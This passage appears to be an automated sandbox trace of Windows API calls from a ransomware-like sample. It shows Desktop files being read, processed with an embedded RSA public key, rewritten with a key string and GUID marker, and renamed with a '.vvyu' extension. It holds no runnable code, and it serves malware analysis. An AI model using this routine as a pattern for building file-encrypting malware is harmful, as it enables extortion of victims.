(HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9a0 [0188.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da00 [0188.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da18 [0188.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9b8 [0188.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d988 [0188.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0188.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0188.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0188.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0188.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0188.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae27b8 | out: hHeap=0x2c0000) returned 1 [0188.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.602] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xa5d7, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xa5d7, lpOverlapped=0x0) returned 1 [0188.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.603] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa5dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.603] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.604] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.605] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.605] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.605] CloseHandle (hObject=0x584) returned 1 [0188.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af1f88 [0188.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.607] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\usU4fi-1.ots" (normalized: "c:\\users\\keecfmwgj\\desktop\\usu4fi-1.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\usU4fi-1.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\usu4fi-1.ots.vvyu")) returned 1 [0188.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.609] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.612] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd31bac60, ftCreationTime.dwHighDateTime=0x1d8a3f9, ftLastAccessTime.dwLowDateTime=0xb8d91740, ftLastAccessTime.dwHighDateTime=0x1d8a627, ftLastWriteTime.dwLowDateTime=0xb8d91740, ftLastWriteTime.dwHighDateTime=0x1d8a627, nFileSizeHigh=0x0, nFileSizeLow=0x11ed8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvnwCx.jpg", cAlternateFileName="")) returned 1 [0188.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae27b8 [0188.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae27b8 | out: hHeap=0x2c0000) returned 1 [0188.612] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\uvnwCx.jpg") returned=".jpg" [0188.612] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\uvnwCx.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\uvnwcx.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.612] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=73432) returned 1 [0188.613] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.617] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11eb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.617] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.619] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.619] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x11ed8, lpOverlapped=0x0) returned 1 [0188.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.620] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.622] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.622] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.622] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.622] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.622] GetLastError () returned 0x0 [0188.622] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.622] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.622] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.622] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.622] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11ee0) returned 0x2af5168 [0188.623] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae27b8 [0188.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2800 [0188.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0188.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.624] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0188.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0188.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0188.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9b8 [0188.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d9a0 [0188.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.626] GetCurrentThreadId () returned 0x5d8 [0188.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee770 [0188.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.627] GetCurrentThreadId () returned 0x5d8 [0188.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.627] HeapFree 